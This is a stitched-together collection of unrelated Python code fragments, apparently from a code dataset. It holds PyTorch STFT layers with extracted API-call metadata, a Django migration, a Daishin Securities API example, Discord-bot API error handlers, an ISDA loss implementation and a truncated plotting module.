pre_emphasis: float = 0,
normalized: bool = False,
onesided: bool = True,
center: bool = False,
mode: str = "librosa") -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
STFT function implementation, equals to STFT layer
Args:
wav: source audio signal
frame_len: length of the frame
frame_hop: hop size between frames
output: output type (complex, real, polar)
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
pre_emphasis: factor of preemphasis
normalized: use normalized DFT kernel
onesided: output onesided STFT
inverse: using iDFT kernel (for iSTFT)
mode: "kaldi"|"librosa", slight difference on applying window function
"""
K, _ = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=False,
mode=mode)
return _forward_stft(wav,
K.to(wav.device),
output=output,
frame_hop=frame_hop,
pre_emphasis=pre_emphasis,
onesided=onesided,
center=center)
def inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
frame_len: int,
frame_hop: int,
input: str = "complex",
window: str = "sqrthann",
round_pow_of_two: bool = True,
normalized: bool = False,
onesided: bool = True,
center: bool = False,
mode: str = "librosa") -> th.Tensor:
"""
iSTFT function implementation, equals to iSTFT layer
Args:
transform: results of STFT
frame_len: length of the frame
frame_hop: hop size between frames
input: input format (complex, real, polar)
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: use normalized DFT kernel
onesided: output onesided STFT
mode: "kaldi"|"librosa", slight difference on applying window function
"""
if isinstance(transform, th.Tensor):
device = transform.device
else:
device = transform[0].device
K, w = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=True,
mode=mode)
return _inverse_stft(transform,
K.to(device),
w.to(device),
input=input,
frame_hop=frame_hop,
onesided=onesided,
center=center)
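# A minimal round-trip sketch (hedged, using only the two functions above):
#   wav = th.randn(1, 16000)
#   cplx = forward_stft(wav, 512, 256, output="complex", center=True)
#   rec = inverse_stft(cplx, 512, 256, input="complex", center=True)
# rec approximates wav up to the analysis/synthesis window normalization.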
class STFTBase(nn.Module):
"""
Base layer for (i)STFT
Args:
frame_len: length of the frame
frame_hop: hop size between frames
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: use normalized DFT kernel
pre_emphasis: factor of preemphasis
mode: "kaldi"|"librosa", slight difference on applying window function
onesided: output onesided STFT
inverse: using iDFT kernel (for iSTFT)
"""
def __init__(self,
frame_len: int,
frame_hop: int,
window: str = "sqrthann",
round_pow_of_two: bool = True,
normalized: bool = False,
pre_emphasis: float = 0,
onesided: bool = True,
inverse: bool = False,
center: bool = False,
mode="librosa") -> None:
super(STFTBase, self).__init__()
K, w = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=inverse,
mode=mode)
self.K = nn.Parameter(K, requires_grad=False)
self.w = nn.Parameter(w, requires_grad=False)
self.frame_len = frame_len
self.frame_hop = frame_hop
self.onesided = onesided
self.pre_emphasis = pre_emphasis
self.center = center
self.mode = mode
self.num_bins = self.K.shape[0] // 4 + 1
self.expr = (
f"window={window}, stride={frame_hop}, onesided={onesided}, " +
f"pre_emphasis={self.pre_emphasis}, normalized={normalized}, " +
f"center={self.center}, mode={self.mode}, " +
f"kernel_size={self.num_bins}x{self.K.shape[2]}")
def num_frames(self, wav_len: th.Tensor) -> th.Tensor:
"""
Compute number of the frames
"""
if th.sum(wav_len <= self.frame_len):
raise RuntimeError(
f"Audio samples less than frame_len ({self.frame_len})")
kernel_size = self.K.shape[-1]
if self.center:
wav_len += kernel_size
return (wav_len - kernel_size) // self.frame_hop + 1
def extra_repr(self) -> str:
return self.expr
class STFT(STFTBase):
"""
Short-time Fourier Transform as a Layer
"""
def __init__(self, *args, **kwargs):
super(STFT, self).__init__(*args, inverse=False, **kwargs)
def forward(
self,
wav: th.Tensor,
output: str = "polar"
) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
Accept (single or multiple channel) raw waveform and output magnitude and phase
Args
wav (Tensor) input signal, N x (C) x S
Return
transform (Tensor or [Tensor, Tensor]), N x (C) x F x T
"""
return _forward_stft(wav,
self.K,
output=output,
frame_hop=self.frame_hop,
pre_emphasis=self.pre_emphasis,
onesided=self.onesided,
center=self.center)
class iSTFT(STFTBase):
"""
Inverse Short-time Fourier Transform as a Layer
"""
def __init__(self, *args, **kwargs):
super(iSTFT, self).__init__(*args, inverse=True, **kwargs)
def forward(self,
transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
input: str = "polar") -> th.Tensor:
"""
Accept phase & magnitude and output raw waveform
Args
transform (Tensor or [Tensor, Tensor]), STFT output
Return
s (Tensor), N x S
"""
return _inverse_stft(transform,
self.K,
self.w,
input=input,
frame_hop=self.frame_hop,
onesided=self.onesided,
center=self.center)
| [
"torch.nn.functional.conv1d",
"math.log2",
"torch.hann_window",
"torch.sin",
"torch.cos",
"torch.sum",
"torch.nn.functional.pad",
"torch.repeat_interleave",
"torch.arange",
"numpy.arange",
"math.gcd",
"torch.unsqueeze",
"torch.eye",
"torch.matmul",
"numpy.abs",
"torch.transpose",
"librosa.filters.mel",
"numpy.cos",
"torch.reshape",
"torch.clamp",
"torch.cat",
"torch.index_select",
"torch.stack",
"torch.atan2",
"numpy.sinc",
"torch.fft",
"torch.tensor",
"torch.chunk",
"torch.nn.Parameter",
"torch.nn.functional.conv_transpose1d",
"torch.zeros",
"torch.nn.functional.unfold"
]
| [((2301, 2317), 'torch.fft', 'th.fft', (['(I / S)', '(1)'], {}), '(I / S, 1)\n', (2307, 2317), True, 'import torch as th\n'), ((2531, 2569), 'torch.reshape', 'th.reshape', (['K', '(B * 2, 1, K.shape[-1])'], {}), '(K, (B * 2, 1, K.shape[-1]))\n', (2541, 2569), True, 'import torch as th\n'), ((3742, 3847), 'librosa.filters.mel', 'filters.mel', (['sr', 'N'], {'n_mels': 'num_mels', 'fmax': 'fmax', 'fmin': 'fmin', 'htk': '(True)', 'norm': "('slaney' if norm else None)"}), "(sr, N, n_mels=num_mels, fmax=fmax, fmin=fmin, htk=True, norm=\n 'slaney' if norm else None)\n", (3753, 3847), True, 'import librosa.filters as filters\n'), ((4016, 4048), 'torch.tensor', 'th.tensor', (['mel'], {'dtype': 'th.float32'}), '(mel, dtype=th.float32)\n', (4025, 4048), True, 'import torch as th\n'), ((4687, 4711), 'math.gcd', 'math.gcd', (['src_sr', 'dst_sr'], {}), '(src_sr, dst_sr)\n', (4695, 4711), False, 'import math\n'), ((5445, 5480), 'torch.tensor', 'th.tensor', (['weight'], {'dtype': 'th.float32'}), '(weight, dtype=th.float32)\n', (5454, 5480), True, 'import torch as th\n'), ((8678, 8705), 'torch.chunk', 'th.chunk', (['packed', '(2)'], {'dim': '(-2)'}), '(packed, 2, dim=-2)\n', (8686, 8705), True, 'import torch as th\n'), ((10915, 10942), 'torch.cat', 'th.cat', (['[real, imag]'], {'dim': '(1)'}), '([real, imag], dim=1)\n', (10921, 10942), True, 'import torch as th\n'), ((10967, 11031), 'torch.nn.functional.conv_transpose1d', 'tf.conv_transpose1d', (['packed', 'kernel'], {'stride': 'frame_hop', 'padding': '(0)'}), '(packed, kernel, stride=frame_hop, padding=0)\n', (10986, 11031), True, 'import torch.nn.functional as tf\n'), ((11211, 11282), 'torch.repeat_interleave', 'th.repeat_interleave', (['window[None, ..., None]', 'packed.shape[-1]'], {'dim': '(-1)'}), '(window[None, ..., None], packed.shape[-1], dim=-1)\n', (11231, 11282), True, 'import torch as th\n'), ((11448, 11509), 'torch.nn.functional.conv_transpose1d', 'tf.conv_transpose1d', (['(win ** 2)', 'I'], {'stride': 'frame_hop', 'padding': '(0)'}), '(win ** 2, I, stride=frame_hop, padding=0)\n', (11467, 11509), True, 'import torch.nn.functional as tf\n'), ((2089, 2133), 'torch.nn.functional.pad', 'tf.pad', (['window', '(lpad, B - frame_len - lpad)'], {}), '(window, (lpad, B - frame_len - lpad))\n', (2095, 2133), True, 'import torch.nn.functional as tf\n'), ((2475, 2496), 'torch.transpose', 'th.transpose', (['K', '(0)', '(2)'], {}), '(K, 0, 2)\n', (2487, 2496), True, 'import torch as th\n'), ((6296, 6352), 'torch.arange', 'th.arange', (['c', '(c + T)'], {'device': 'feats.device', 'dtype': 'th.int64'}), '(c, c + T, device=feats.device, dtype=th.int64)\n', (6305, 6352), True, 'import torch as th\n'), ((6367, 6398), 'torch.clamp', 'th.clamp', (['idx'], {'min': '(0)', 'max': '(T - 1)'}), '(idx, min=0, max=T - 1)\n', (6375, 6398), True, 'import torch as th\n'), ((6515, 6530), 'torch.cat', 'th.cat', (['ctx', '(-1)'], {}), '(ctx, -1)\n', (6521, 6530), True, 'import torch as th\n'), ((6588, 6605), 'torch.stack', 'th.stack', (['ctx', '(-1)'], {}), '(ctx, -1)\n', (6596, 6605), True, 'import torch as th\n'), ((8010, 8049), 'torch.nn.functional.pad', 'tf.pad', (['wav', '(pad, pad)'], {'mode': '"""reflect"""'}), "(wav, (pad, pad), mode='reflect')\n", (8016, 8049), True, 'import torch.nn.functional as tf\n'), ((8124, 8199), 'torch.nn.functional.unfold', 'tf.unfold', (['wav[:, None]', '(1, kernel.shape[-1])'], {'stride': 'frame_hop', 'padding': '(0)'}), '(wav[:, None], (1, kernel.shape[-1]), stride=frame_hop, padding=0)\n', (8133, 8199), True, 'import 
torch.nn.functional as tf\n'), ((8388, 8430), 'torch.matmul', 'th.matmul', (['kernel[:, 0][None, ...]', 'frames'], {}), '(kernel[:, 0][None, ...], frames)\n', (8397, 8430), True, 'import torch as th\n'), ((8458, 8509), 'torch.nn.functional.conv1d', 'tf.conv1d', (['wav', 'kernel'], {'stride': 'frame_hop', 'padding': '(0)'}), '(wav, kernel, stride=frame_hop, padding=0)\n', (8467, 8509), True, 'import torch.nn.functional as tf\n'), ((10569, 10590), 'torch.unsqueeze', 'th.unsqueeze', (['real', '(0)'], {}), '(real, 0)\n', (10581, 10590), True, 'import torch as th\n'), ((10606, 10627), 'torch.unsqueeze', 'th.unsqueeze', (['imag', '(0)'], {}), '(imag, 0)\n', (10618, 10627), True, 'import torch as th\n'), ((10791, 10826), 'torch.cat', 'th.cat', (['[real, real[:, reverse]]', '(1)'], {}), '([real, real[:, reverse]], 1)\n', (10797, 10826), True, 'import torch as th\n'), ((10842, 10878), 'torch.cat', 'th.cat', (['[imag, -imag[:, reverse]]', '(1)'], {}), '([imag, -imag[:, reverse]], 1)\n', (10848, 10878), True, 'import torch as th\n'), ((11369, 11411), 'torch.eye', 'th.eye', (['window.shape[0]'], {'device': 'win.device'}), '(window.shape[0], device=win.device)\n', (11375, 11411), True, 'import torch as th\n'), ((16516, 16552), 'torch.nn.Parameter', 'nn.Parameter', (['K'], {'requires_grad': '(False)'}), '(K, requires_grad=False)\n', (16528, 16552), True, 'import torch.nn as nn\n'), ((16570, 16606), 'torch.nn.Parameter', 'nn.Parameter', (['w'], {'requires_grad': '(False)'}), '(w, requires_grad=False)\n', (16582, 16606), True, 'import torch.nn as nn\n'), ((17281, 17314), 'torch.sum', 'th.sum', (['(wav_len <= self.frame_len)'], {}), '(wav_len <= self.frame_len)\n', (17287, 17314), True, 'import torch as th\n'), ((543, 587), 'torch.hann_window', 'th.hann_window', (['frame_len'], {'periodic': 'periodic'}), '(frame_len, periodic=periodic)\n', (557, 587), True, 'import torch as th\n'), ((2241, 2250), 'torch.eye', 'th.eye', (['B'], {}), '(B)\n', (2247, 2250), True, 'import torch as th\n'), ((2252, 2266), 'torch.zeros', 'th.zeros', (['B', 'B'], {}), '(B, B)\n', (2260, 2266), True, 'import torch as th\n'), ((6418, 6449), 'torch.index_select', 'th.index_select', (['feats', '(-2)', 'idx'], {}), '(feats, -2, idx)\n', (6433, 6449), True, 'import torch as th\n'), ((8969, 8999), 'torch.stack', 'th.stack', (['[real, imag]'], {'dim': '(-1)'}), '([real, imag], dim=-1)\n', (8977, 8999), True, 'import torch as th\n'), ((9073, 9093), 'torch.atan2', 'th.atan2', (['imag', 'real'], {}), '(imag, real)\n', (9081, 9093), True, 'import torch as th\n'), ((1896, 1916), 'math.log2', 'math.log2', (['frame_len'], {}), '(frame_len)\n', (1905, 1916), False, 'import math\n'), ((5147, 5173), 'numpy.arange', 'np.arange', (['(2 * padding + 1)'], {}), '(2 * padding + 1)\n', (5156, 5173), True, 'import numpy as np\n'), ((5230, 5253), 'numpy.abs', 'np.abs', (['(times / padding)'], {}), '(times / padding)\n', (5236, 5253), True, 'import numpy as np\n'), ((5301, 5334), 'numpy.cos', 'np.cos', (['(times / padding * math.pi)'], {}), '(times / padding * math.pi)\n', (5307, 5334), True, 'import numpy as np\n'), ((5349, 5381), 'numpy.sinc', 'np.sinc', (['(times * zeros_per_block)'], {}), '(times * zeros_per_block)\n', (5356, 5381), True, 'import numpy as np\n'), ((10236, 10256), 'torch.cos', 'th.cos', (['transform[1]'], {}), '(transform[1])\n', (10242, 10256), True, 'import torch as th\n'), ((10287, 10307), 'torch.sin', 'th.sin', (['transform[1]'], {}), '(transform[1])\n', (10293, 10307), True, 'import torch as th\n'), ((3408, 3428), 'math.log2', 
'math.log2', (['frame_len'], {}), '(frame_len)\n', (3417, 3428), False, 'import math\n'), ((5019, 5036), 'numpy.arange', 'np.arange', (['dst_sr'], {}), '(dst_sr)\n', (5028, 5036), True, 'import numpy as np\n'), ((5083, 5100), 'numpy.arange', 'np.arange', (['src_sr'], {}), '(src_sr)\n', (5092, 5100), True, 'import numpy as np\n')] |
# Generated by Django 2.2.5 on 2020-04-08 00:08
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('budget', '0004_auto_20200407_2356'),
]
operations = [
migrations.DeleteModel(
name='HiddenStatus_Budget',
),
]
| [
"django.db.migrations.DeleteModel"
]
| [((226, 276), 'django.db.migrations.DeleteModel', 'migrations.DeleteModel', ([], {'name': '"""HiddenStatus_Budget"""'}), "(name='HiddenStatus_Budget')\n", (248, 276), False, 'from django.db import migrations\n')] |
# Daishin Securities (대신증권) API
# Example comparing the two ways of requesting data: BlockRequest and Request
# There are two main ways to request data from the Plus API:
#
# BlockRequest - the simplest way to request and receive data
# Request      - call Request, then receive the data via the OnReceived event
#
# The code below is an example that lets you compare the two approaches.
# For ordinary data requests, BlockRequest is the simplest.
# However, BlockRequest also pumps messages internally, so the call can fail if real-time
# quotes arrive, or the function is re-entered from another event, before the request completes.
# If you have to communicate while receiving complex real-time quotes, use the Request method.
import pythoncom
from PyQt5.QtWidgets import *
import win32com.client
import win32event
g_objCodeMgr = win32com.client.Dispatch('CpUtil.CpCodeMgr')
StopEvent = win32event.CreateEvent(None, 0, 0, None)
class CpEvent:
def set_params(self, client, name, caller):
        self.client = client  # CP real-time communication object
        self.name = name  # name used to tell events from different services apart
        self.caller = caller  # kept for callbacks
def OnReceived(self):
        # Real-time handling - current price / order fills
        if self.name == 'stockmst':
            print('received')
win32event.SetEvent(StopEvent)
return
class CpCurReply:
def __init__(self, objEvent):
self.name = "stockmst"
self.obj = objEvent
def Subscribe(self):
handler = win32com.client.WithEvents(self.obj, CpEvent)
handler.set_params(self.obj, self.name, None)
def MessagePump(timeout):
waitables = [StopEvent]
while 1:
rc = win32event.MsgWaitForMultipleObjects(
waitables,
0, # Wait for all = false, so it waits for anyone
timeout, # (or win32event.INFINITE)
win32event.QS_ALLEVENTS) # Accepts all input
if rc == win32event.WAIT_OBJECT_0:
# Our first event listed, the StopEvent, was triggered, so we must exit
print('stop event')
break
elif rc == win32event.WAIT_OBJECT_0 + len(waitables):
# A windows message is waiting - take care of it. (Don't ask me
# why a WAIT_OBJECT_MSG isn't defined < WAIT_OBJECT_0...!).
# This message-serving MUST be done for COM, DDE, and other
# Windowsy things to work properly!
print('pump')
if pythoncom.PumpWaitingMessages():
break # we received a wm_quit message
elif rc == win32event.WAIT_TIMEOUT:
print('timeout')
return
pass
else:
print('exception')
raise RuntimeError("unexpected win32wait return value")
code = 'A005930'
##############################################################
# 1. BlockRequest
print('#####################################')
objStockMst = win32com.client.Dispatch("DsCbo1.StockMst")
objStockMst.SetInputValue(0, code)
objStockMst.BlockRequest()
print('Data received via BlockRequest')
item = {}
item['종목명'] = g_objCodeMgr.CodeToName(code)  # stock name
item['현재가'] = objStockMst.GetHeaderValue(11)  # current (closing) price
item['대비'] = objStockMst.GetHeaderValue(12)  # change vs. previous day
print(item)
print('')
##############################################################
# 2. Request ==> message pump ==> data received via the OnReceived event
print('#####################################')
objReply = CpCurReply(objStockMst)
objReply.Subscribe()
code = 'A005930'
objStockMst.SetInputValue(0, code)
objStockMst.Request()
MessagePump(10000)
item = {}
item['종목명'] = g_objCodeMgr.CodeToName(code)  # stock name
item['현재가'] = objStockMst.GetHeaderValue(11)  # current (closing) price
item['대비'] = objStockMst.GetHeaderValue(12)  # change vs. previous day
print(item)
| [
"win32event.SetEvent",
"pythoncom.PumpWaitingMessages",
"win32event.CreateEvent",
"win32event.MsgWaitForMultipleObjects"
]
| [((629, 669), 'win32event.CreateEvent', 'win32event.CreateEvent', (['None', '(0)', '(0)', 'None'], {}), '(None, 0, 0, None)\n', (651, 669), False, 'import win32event\n'), ((1438, 1527), 'win32event.MsgWaitForMultipleObjects', 'win32event.MsgWaitForMultipleObjects', (['waitables', '(0)', 'timeout', 'win32event.QS_ALLEVENTS'], {}), '(waitables, 0, timeout, win32event.\n QS_ALLEVENTS)\n', (1474, 1527), False, 'import win32event\n'), ((1032, 1062), 'win32event.SetEvent', 'win32event.SetEvent', (['StopEvent'], {}), '(StopEvent)\n', (1051, 1062), False, 'import win32event\n'), ((2236, 2267), 'pythoncom.PumpWaitingMessages', 'pythoncom.PumpWaitingMessages', ([], {}), '()\n', (2265, 2267), False, 'import pythoncom\n')] |
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from Platforms.Web.main_web import PhaazebotWeb
import json
from aiohttp.web import Response
from Utils.Classes.extendedrequest import ExtendedRequest
async def apiDiscordConfigsQuoteDisabledChannelExists(cls:"PhaazebotWeb", WebRequest:ExtendedRequest, **kwargs) -> Response:
"""
Optional keywords:
------------------
* msg `str` : (Default: None) * [Overwrites default]
* channel_id `str` *
* channel_name `str` *
Default message (*gets altered by optional keywords):
----------------------------------------------------
Disabled quote channel already exists
"""
res:dict = dict(status=400, error="discord_disabled_regularchannel_exists")
channel_id:str = kwargs.get("channel_id", "")
if channel_id:
res["channel_id"] = str(channel_id)
channel_name:str = kwargs.get("channel_name", "")
if channel_name:
res["channel_name"] = str(channel_name)
# build message
default_msg:str = "Disabled quote channel already exists"
if channel_name:
default_msg += f" for '{channel_name}'"
if channel_id:
default_msg += f" (Channel ID:{channel_id})"
msg:str = kwargs.get("msg", default_msg)
res["msg"] = msg
cls.BASE.Logger.debug(f"(API/Discord) 400 Channel exists: {WebRequest.path}", require="api:400")
return cls.response(
text=json.dumps(res),
content_type="application/json",
status=400
)
async def apiDiscordConfigsQuoteDisabledChannelNotExists(cls:"PhaazebotWeb", WebRequest:ExtendedRequest, **kwargs) -> Response:
"""
Optional keywords:
------------------
* msg `str` : (Default: None) * [Overwrites default]
* channel_id `str` *
* channel_name `str` *
Default message (*gets altered by optional keywords):
----------------------------------------------------
	Disabled quote channel does not exist
"""
res:dict = dict(status=400, error="discord_disabled_regularchannel_not_exists")
channel_id:str = kwargs.get("channel_id", "")
if channel_id:
res["channel_id"] = str(channel_id)
channel_name:str = kwargs.get("channel_name", "")
if channel_name:
res["channel_name"] = str(channel_name)
# build message
	default_msg:str = "Disabled quote channel does not exist"
if channel_name:
default_msg += f" for '{channel_name}'"
if channel_id:
default_msg += f" (Channel ID:{channel_id})"
msg:str = kwargs.get("msg", default_msg)
res["msg"] = msg
cls.BASE.Logger.debug(f"(API/Discord) 400 Channel does not exists: {WebRequest.path}", require="api:400")
return cls.response(
text=json.dumps(res),
content_type="application/json",
status=400
)
| [
"json.dumps"
]
| [((1311, 1326), 'json.dumps', 'json.dumps', (['res'], {}), '(res)\n', (1321, 1326), False, 'import json\n'), ((2504, 2519), 'json.dumps', 'json.dumps', (['res'], {}), '(res)\n', (2514, 2519), False, 'import json\n')] |
import torch
import torch.nn as nn
class EstimatorCV():
def __init__(self, feature_num, class_num):
super(EstimatorCV, self).__init__()
self.class_num = class_num
self.CoVariance = torch.zeros(class_num, feature_num, feature_num)#.cuda()
self.Ave = torch.zeros(class_num, feature_num)#.cuda()
self.Amount = torch.zeros(class_num)#.cuda()
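    # Incrementally update the per-class feature mean (Ave) and covariance (CoVariance) with the statistics of a new batch.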
def update_CV(self, features, labels):
N = features.size(0)
C = self.class_num
A = features.size(1)
NxCxFeatures = features.view(
N, 1, A
).expand(
N, C, A
)
onehot = torch.zeros(N, C)#.cuda()
onehot.scatter_(1, labels.view(-1, 1), 1)
NxCxA_onehot = onehot.view(N, C, 1).expand(N, C, A)
features_by_sort = NxCxFeatures.mul(NxCxA_onehot)
Amount_CxA = NxCxA_onehot.sum(0)
Amount_CxA[Amount_CxA == 0] = 1
ave_CxA = features_by_sort.sum(0) / Amount_CxA
var_temp = features_by_sort - \
ave_CxA.expand(N, C, A).mul(NxCxA_onehot)
var_temp = torch.bmm(
var_temp.permute(1, 2, 0),
var_temp.permute(1, 0, 2)
).div(Amount_CxA.view(C, A, 1).expand(C, A, A))
sum_weight_CV = onehot.sum(0).view(C, 1, 1).expand(C, A, A)
sum_weight_AV = onehot.sum(0).view(C, 1).expand(C, A)
weight_CV = sum_weight_CV.div(
sum_weight_CV + self.Amount.view(C, 1, 1).expand(C, A, A)
)
weight_CV[weight_CV != weight_CV] = 0
weight_AV = sum_weight_AV.div(
sum_weight_AV + self.Amount.view(C, 1).expand(C, A)
)
weight_AV[weight_AV != weight_AV] = 0
additional_CV = weight_CV.mul(1 - weight_CV).mul(
torch.bmm(
(self.Ave - ave_CxA).view(C, A, 1),
(self.Ave - ave_CxA).view(C, 1, A)
)
)
self.CoVariance = (self.CoVariance.mul(1 - weight_CV) + var_temp
.mul(weight_CV)).detach() + additional_CV.detach()
self.Ave = (self.Ave.mul(1 - weight_AV) + ave_CxA.mul(weight_AV)).detach()
self.Amount += onehot.sum(0)
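# ISDA loss: cross-entropy applied to logits augmented with per-class covariance statistics (implicit semantic data augmentation).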
class ISDALoss(nn.Module):
def __init__(self, feature_num, class_num):
super(ISDALoss, self).__init__()
self.estimator = EstimatorCV(feature_num, class_num)
self.class_num = class_num
self.cross_entropy = nn.CrossEntropyLoss()
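    # Build augmented logits: for a sample with label y, logit j gets an extra 0.5 * ratio * (w_j - w_y)^T CV_y (w_j - w_y) term.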
def isda_aug(self, fc, features, y, labels, cv_matrix, ratio):
N = features.size(0)
C = self.class_num
A = features.size(1)
weight_m = list(fc.parameters())[0]
NxW_ij = weight_m.expand(N, C, A)
NxW_kj = torch.gather(NxW_ij,
1,
labels.view(N, 1, 1)
.expand(N, C, A))
CV_temp = cv_matrix[labels]
# sigma2 = ratio * \
# torch.bmm(torch.bmm(NxW_ij - NxW_kj,
# CV_temp).view(N * C, 1, A),
# (NxW_ij - NxW_kj).view(N * C, A, 1)).view(N, C)
sigma2 = ratio * \
torch.bmm(torch.bmm(NxW_ij - NxW_kj,
CV_temp),
(NxW_ij - NxW_kj).permute(0, 2, 1))
sigma2 = sigma2.mul(torch.eye(C)#.cuda()
.expand(N, C, C)).sum(2).view(N, C)
aug_result = y + 0.5 * sigma2
return aug_result
def forward(self, model, fc, x, target_x, ratio):
features = model(x)
y = fc(features)
self.estimator.update_CV(features.detach(), target_x)
isda_aug_y = self.isda_aug(fc, features, y, target_x, self.estimator.CoVariance.detach(), ratio)
loss = self.cross_entropy(isda_aug_y, target_x)
return loss, y
| [
"torch.bmm",
"torch.eye",
"torch.nn.CrossEntropyLoss",
"torch.zeros"
]
| [((211, 259), 'torch.zeros', 'torch.zeros', (['class_num', 'feature_num', 'feature_num'], {}), '(class_num, feature_num, feature_num)\n', (222, 259), False, 'import torch\n'), ((287, 322), 'torch.zeros', 'torch.zeros', (['class_num', 'feature_num'], {}), '(class_num, feature_num)\n', (298, 322), False, 'import torch\n'), ((353, 375), 'torch.zeros', 'torch.zeros', (['class_num'], {}), '(class_num)\n', (364, 375), False, 'import torch\n'), ((637, 654), 'torch.zeros', 'torch.zeros', (['N', 'C'], {}), '(N, C)\n', (648, 654), False, 'import torch\n'), ((2419, 2440), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {}), '()\n', (2438, 2440), True, 'import torch.nn as nn\n'), ((3176, 3211), 'torch.bmm', 'torch.bmm', (['(NxW_ij - NxW_kj)', 'CV_temp'], {}), '(NxW_ij - NxW_kj, CV_temp)\n', (3185, 3211), False, 'import torch\n'), ((3342, 3354), 'torch.eye', 'torch.eye', (['C'], {}), '(C)\n', (3351, 3354), False, 'import torch\n')] |
"""
Module for plotting analyses
"""
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from copy import deepcopy
import pickle, json
import os
from matplotlib.offsetbox import AnchoredOffsetbox
try:
basestring
except NameError:
basestring = str
colorList = [[0.42, 0.67, 0.84], [0.90, 0.76, 0.00], [0.42, 0.83, 0.59], [0.90, 0.32, 0.00], [0.34, 0.67, 0.67], [0.90, 0.59, 0.00], [0.42, 0.82, 0.83], [1.00, 0.85, 0.00], [0.33, 0.67, 0.47], [1.00, 0.38, 0.60], [0.57, 0.67, 0.33], [0.50, 0.20, 0.00], [0.71, 0.82, 0.41], [0.00, 0.20, 0.50], [0.70, 0.32, 0.10]] * 3
class MetaFigure:
"""A class which defines a figure object"""
def __init__(self, kind, sim=None, subplots=None, rcParams=None, autosize=0.35, **kwargs):
if not sim:
from .. import sim
self.sim = sim
self.kind = kind
# Make a copy of the current matplotlib rcParams and update them
self.orig_rcParams = deepcopy(mpl.rcParamsDefault)
if rcParams:
for rcParam in rcParams:
if rcParam in mpl.rcParams:
mpl.rcParams[rcParam] = rcParams[rcParam]
else:
print(rcParam, 'not found in matplotlib.rcParams')
self.rcParams = rcParams
else:
self.rcParams = self.orig_rcParams
# Set up any subplots
if not subplots:
nrows = 1
ncols = 1
elif type(subplots) == int:
nrows = subplots
ncols = 1
elif type(subplots) == list:
nrows = subplots[0]
ncols = subplots[1]
# Create figure
if 'figSize' in kwargs:
figSize = kwargs['figSize']
else:
figSize = self.rcParams['figure.figsize']
if 'dpi' in kwargs:
dpi = kwargs['dpi']
else:
dpi = self.rcParams['figure.dpi']
if autosize:
maxplots = np.max([nrows, ncols])
figSize0 = figSize[0] + (maxplots-1)*(figSize[0]*autosize)
figSize1 = figSize[1] + (maxplots-1)*(figSize[1]*autosize)
figSize = [figSize0, figSize1]
self.fig, self.ax = plt.subplots(nrows, ncols, figsize=figSize, dpi=dpi)
self.plotters = []
def saveFig(self, sim=None, fileName=None, fileDesc=None, fileType='png', fileDir=None, overwrite=True, **kwargs):
"""
'eps': 'Encapsulated Postscript',
'jpg': 'Joint Photographic Experts Group',
'jpeg': 'Joint Photographic Experts Group',
'pdf': 'Portable Document Format',
'pgf': 'PGF code for LaTeX',
'png': 'Portable Network Graphics',
'ps': 'Postscript',
'raw': 'Raw RGBA bitmap',
'rgba': 'Raw RGBA bitmap',
'svg': 'Scalable Vector Graphics',
'svgz': 'Scalable Vector Graphics',
'tif': 'Tagged Image File Format',
'tiff': 'Tagged Image File Format'
"""
if not sim:
from .. import sim
if fileDesc is not None:
fileDesc = '_' + str(fileDesc)
else:
fileDesc = '_' + self.kind
if fileType not in self.fig.canvas.get_supported_filetypes():
raise Exception('fileType not recognized in saveFig')
else:
fileExt = '.' + fileType
if not fileName or not isinstance(fileName, basestring):
fileName = self.sim.cfg.filename + fileDesc + fileExt
else:
if fileName.endswith(fileExt):
fileName = fileName.split(fileExt)[0] + fileDesc + fileExt
else:
fileName = fileName + fileDesc + fileExt
if fileDir is not None:
fileName = os.path.join(fileDir, fileName)
if not overwrite:
while os.path.isfile(fileName):
try:
fileNumStr = fileName.split(fileExt)[0].split('_')[-1]
fileNumStrNew = str(int(fileNumStr) + 1).zfill(2)
fileName = fileName.split('_' + fileNumStr)[0]
except:
fileNumStr = fileNumStrNew = '01'
fileName = fileName.split(fileExt)[0]
fileName = fileName.split(fileNumStr)[0] + '_' + fileNumStrNew + fileExt
self.fig.savefig(fileName)
self.fileName = fileName
return fileName
def showFig(self, **kwargs):
try:
self.fig.show(block=False)
except:
self.fig.show()
def addSuptitle(self, **kwargs):
self.fig.suptitle(**kwargs)
def finishFig(self, **kwargs):
if 'suptitle' in kwargs:
if kwargs['suptitle']:
self.addSuptitle(**kwargs['suptitle'])
if 'tightLayout' not in kwargs:
plt.tight_layout()
elif kwargs['tightLayout']:
plt.tight_layout()
if 'saveFig' in kwargs:
if kwargs['saveFig']:
self.saveFig(**kwargs)
if 'showFig' in kwargs:
if kwargs['showFig']:
self.showFig(**kwargs)
else:
plt.close(self.fig)
# Reset the matplotlib rcParams to their original settings
mpl.style.use(self.orig_rcParams)
class GeneralPlotter:
"""A class used for plotting"""
def __init__(self, data, kind, axis=None, sim=None, rcParams=None, metafig=None, **kwargs):
"""
Parameters
----------
data : dict, str
axis : matplotlib axis
            The axis to plot into. If axis is set to None, a new figure and axis are created and plotted into. If plotting into an existing axis, more options are available: xtwin, ytwin, etc.
"""
self.kind = kind
# Load data
if type(data) == str:
if os.path.isfile(data):
self.data = self.loadData(data)
else:
raise Exception('In Plotter, if data is a string, it must be the path to a data file.')
else:
self.data = data
if not sim:
from .. import sim
self.sim = sim
self.axis = axis
if metafig:
self.metafig = metafig
# If an axis is input, plot there; otherwise make a new figure and axis
if self.axis is None:
final = True
